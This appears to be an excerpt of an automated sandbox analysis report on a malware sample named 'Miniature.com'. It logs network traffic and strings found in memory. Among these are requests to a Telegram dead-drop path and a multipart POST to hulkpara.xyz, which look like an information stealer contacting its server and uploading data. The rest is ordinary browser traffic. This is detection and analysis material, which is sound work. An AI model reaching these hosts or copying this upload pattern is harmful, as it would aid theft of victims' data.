                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
                Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.108
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.108
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.108
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 104.126.116.26
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.49.251.8
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 23.219.82.72
                Source: unknownTCP traffic detected without corresponding DNS query: 108.139.47.108
                Source: C:\Users\user\AppData\Local\Temp\325114\Miniature.comCode function: 16_2_00C8D889 InternetReadFile,SetEvent,GetLastError,SetEvent,16_2_00C8D889
                Source: global trafficHTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: hulkpara.xyzConnection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /statics/icons/favicon_newtabpage.png HTTP/1.1Host: assets.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
                Source: global trafficHTTP traffic detected: GET /b?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
                Source: global trafficHTTP traffic detected: GET /b2?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=1D5eb283802c974f6e27c9d1734592444; XID=1D5eb283802c974f6e27c9d1734592444
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&MUID=08F1B41B03E76B2C0A73A14102FE6A7B HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1; SM=T
                Source: c8d9689d-0597-4245-aa4d-5d8caf914840.tmp.26.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000003.1652894366.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1653082104.0000010400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1653125319.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000015.00000003.1652894366.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1653082104.0000010400F98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1653125319.0000010400450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1724886673.0000010400799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1723256333.00000104002D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: cvCCAtzStAgfHNw.cvCCAtzStAgfHNw
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: hulkpara.xyz
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----TR9Z5XBSR1N7YU3OPPZ5User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: hulkpara.xyzContent-Length: 256Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000015.00000003.1650359468.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1726866477.0000010400C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1649830488.0000010400380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1650382782.0000010400AAC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000018.00000003.1788498091.000071EC0035C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
